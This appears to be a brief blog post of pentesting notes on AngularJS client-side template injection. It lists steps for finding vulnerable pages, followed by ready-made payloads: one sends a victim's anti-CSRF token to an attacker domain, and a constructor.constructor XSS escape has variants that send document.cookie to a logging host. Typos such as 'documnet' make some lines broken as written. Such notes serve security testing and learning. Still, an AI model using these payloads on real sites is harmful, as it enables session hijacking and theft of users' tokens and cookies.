Template Injection & Scope Hacking
- Attack is limited to $scope functions and variables
- Check if an application is using angular JS & Vulnerable to Template Injection or not.
- Check the source code for `angular` keyword
- open dev tools --> Console --> `angular.element($0).scope()`
- This lists the scope - all the elements in the page
- Check the soure code of functions to see what its doing
- Developer tools --> Debugger --> Select app.js (whatever JS filename is) --> search for that function ;
- Check for any injectable variables (Ex: some empty or dynamic content )
- Call the function
- Send the below payload as input and see the connection going out - which has the victim's anti-csrf token
-` {{Function_Name("https://attacker.domain/reach.php?x="+anti_csrf"")}}`
- input `{{4-1}}` --> if the output is 3 --> VULNERABLE
- use this any input or search parametes.
Going Beyond the Scope - XSS via Template Injection
- Works in AngularJS>= 1.6.0
- https://portswigger.net/research/xss-without-html-client-side-template-injection-with-angularjs
- Find Angulra Version in Dev tools --> console
- angular.version
- Create an alert
- `{{constructor.constructor('alert(document.domain)')()}}`
- Get the user cookie
-` {{constructor.constructor('$.get(\'//attac.local/log.php?\'+documnet.cookie)')()}}`
- If there any known varaiable
- `#var_name=constructor.constructor('$.get(\'//attac.local/log.php?\'+documnet.cookie)')()`
Comments
Post a Comment